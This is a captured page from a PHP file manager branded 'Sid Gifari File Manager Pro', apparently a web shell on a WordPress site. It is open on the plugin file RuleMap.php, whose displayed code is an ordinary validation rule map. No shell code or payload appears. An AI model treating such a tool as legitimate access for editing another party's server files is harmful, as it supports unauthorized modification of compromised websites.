🔐 Sid Gifari File Manager Pro
v8.0.5 | 2026-06-18 09:07:16 | PHP 8.1.34
📂
/ (Root)
/
home
/
therahul
/
ramailobhela.com
/
wp-content
/
plugins
/
wp-event-solution
/
base
/
Validation
📍 /home/therahul/ramailobhela.com/wp-content/plugins/wp-event-solution/base/Validation
🔄 Refresh
✏️
Editing: RuleMap.php
Writable
<?php namespace Eventin\Validation; use Eventin\Validation\Rules\RequiredRule; /** * Rule map class */ class RuleMap { /** * Store rule map * * @var array */ protected static $map = [ 'required' => RequiredRule::class, ]; /** * Resolve rules * * @param string $rule * @param array $options * * @return Rule */ public static function resolve_rule_map( $rule, $options ) { return new static::$map[$rule]( ...$options ); } }
💾 Save Changes
❌ Cancel